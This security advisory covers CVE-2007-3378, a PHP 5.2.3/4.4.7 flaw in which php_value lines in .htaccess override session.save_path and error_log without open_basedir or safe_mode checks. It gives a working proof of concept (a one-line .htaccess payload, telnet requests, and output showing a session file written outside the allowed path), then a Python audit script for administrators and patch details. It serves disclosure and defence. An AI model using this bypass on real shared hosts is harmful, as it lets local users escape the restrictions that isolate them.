Affected Systems:
PHP 5.2.3
PHP 4.4.7
Unaffected system:
PHP 5.2.4
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 24661, 25498
CVE (CAN) ID: CVE-2007-3378
PHP is a widely used scripting language. It is especially suitable for Web development and can be embedded into HTML.
PHP has a vulnerability in how it processes configuration directives in .htaccess files. Local attackers may exploit this vulnerability to bypass some of PHP's security restrictions.
When PHP runs as an Apache module, php_value directives in a .htaccess file can change configuration settings. These directives are intended for settings such as display_errors, but they can also be used to bypass the safe_mode and open_basedir restrictions that several functions enforce. For example, session.save_path can be set through .htaccess: session_save_path() and ini_set() check the save path against safe_mode and open_basedir, but a value set in .htaccess is never checked.
Example:
cxib# ls -la /www/cxib/
total 14
drwxr-xr-x   3 cxib  www   512 Feb 16 20:20 .
drwxr-xr-x  11 www   www  7168 Feb 16 20:07 ..
-rw-r--r--   1 cxib  www    53 Feb 16 20:19 stars.php
drwxr-xr-x   2 cxib  www   512 Feb 16 20:18 temps
cxib# cat /www/cxib/stars.php
<?php
session_save_path("/inne");
session_start();
?>
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:22:58 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 732
Content-Type: text/html

<br />
<b>Warning</b>:  session_save_path() [<a href='function.session-save-path'>function.session-save-path</a>]: open_basedir restriction in effect. File(/inne) is not within the allowed path(s): (/www) in <b>/www/cxib/stars.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>:  session_start() [<a href='function.session-start'>function.session-start</a>]: open_basedir restriction in effect. File(/var/tmp/) is not within the allowed path(s): (/www) in <b>/www/cxib/stars.php</b> on line <b>3</b><br />
<br />
<b>Fatal error</b>:  session_start() [<a href='function.session-start'>function.session-start</a>]: Failed to initialize storage module: files (path: ) in <b>/www/cxib/stars.php</b> on line <b>3</b><br />
Connection closed by foreign host.
cxib#
So session_save_path() cannot place session files in /inne, because open_basedir blocks it. A .htaccess file can still be created in the web directory, however, containing:
---
php_value session.save_path /inne
---
cxib# ls -la /www/cxib/
total 16
drwxr-xr-x   3 cxib  www   512 Feb 16 20:26 .
drwxr-xr-x  11 www   www  7168 Feb 16 20:26 ..
-rw-r--r--   1 cxib  www    34 Feb 16 20:26 .htaccess
-rw-r--r--   1 cxib  www    53 Feb 16 20:19 stars.php
drwxr-xr-x   2 cxib  www   512 Feb 16 20:18 temps
cxib# cat /www/cxib/.htaccess
php_value session.save_path /inne
cxib# cat /www/cxib/stars.php
<?php
session_start();
?>
session.save_path cannot be set to /inne through ini_set() or session_save_path(), but with the .htaccess in place, send the following request:
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:30:42 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html

Connection closed by foreign host.
cxib#
cxib# ls -la /inne
total 3
drwxrwxrwx   2 root  wheel   512 Feb 16 20:30 .
drwxr-xr-x  24 root  wheel  1024 Feb 16 20:05 ..
-rw-------   1 www   wheel     0 Feb 16 20:30 sess_45cae9284f2f8b7cb05ce96021c9bf4e
The session file is written to /inne, outside open_basedir, so the open_basedir and safe_mode restrictions are bypassed. error_log and some other path-valued settings have the same problem.
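An added audit check, not part of the advisory, for administrators who cannot upgrade immediately or want to find .htaccess files that already rely on this behaviour: it parses php_value directives and flags the path-valued settings named above (session.save_path, error_log) when they point outside the configured open_basedir. It assumes a Unix-style ':'-separated open_basedir and treats the sample .htaccess as constructed from the advisory's example.

```python
import os
import re

# Path-valued ini settings that open_basedir should constrain but that a
# .htaccess php_value could override in the affected versions (per the advisory).
PATH_SETTINGS = ("session.save_path", "error_log")

# php_value <setting> <value>; php_flag only carries On/Off, so it is not parsed.
DIRECTIVE_RE = re.compile(r"^\s*php_value\s+(\S+)\s+(.+?)\s*$", re.IGNORECASE)

# Constructed sample, modelled on the .htaccess shown in the advisory.
SAMPLE_HTACCESS = """\
php_value session.save_path /inne
php_value display_errors On
php_value error_log /www/cxib/logs/php.log
"""


def parse_php_values(htaccess_text):
    """Return (setting, value) pairs for every php_value line."""
    pairs = []
    for line in htaccess_text.splitlines():
        m = DIRECTIVE_RE.match(line)
        if m:
            pairs.append((m.group(1).lower(), m.group(2).strip("\"'")))
    return pairs


def within_open_basedir(path, open_basedir):
    """True if `path` equals or lies under one of the open_basedir prefixes."""
    target = os.path.normpath(path)
    for base in open_basedir.split(":"):
        base = os.path.normpath(base)
        if target == base or target.startswith(base.rstrip("/") + "/"):
            return True
    return False


def audit_htaccess(htaccess_text, open_basedir):
    """Return [(setting, path)] for path-valued settings that escape open_basedir."""
    findings = []
    for setting, value in parse_php_values(htaccess_text):
        if setting not in PATH_SETTINGS:
            continue
        if setting == "error_log" and value.lower() == "syslog":
            continue  # not a filesystem path
        # session.save_path may be written as "N;/path" or "N;MODE;/path".
        path = value.rsplit(";", 1)[-1]
        if not within_open_basedir(path, open_basedir):
            findings.append((setting, path))
    return findings


if __name__ == "__main__":
    for setting, path in audit_htaccess(SAMPLE_HTACCESS, "/www"):
        print(f"escapes open_basedir: {setting} = {path}")
```

Run it over each .htaccess under the document root with the open_basedir value from the matching vhost; a non-empty result means the directive would have taken effect unchecked on the affected versions.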
<* Source: Maksymilian Arciemowicz (max@jestsuper.pl)
Link: http://securityreason.com/achievement_securityalert/45
http://secunia.com/advisories/26642/
http://www.php.net/releases/5_2_4.php
*>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
PHP
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.php.net/downloads.php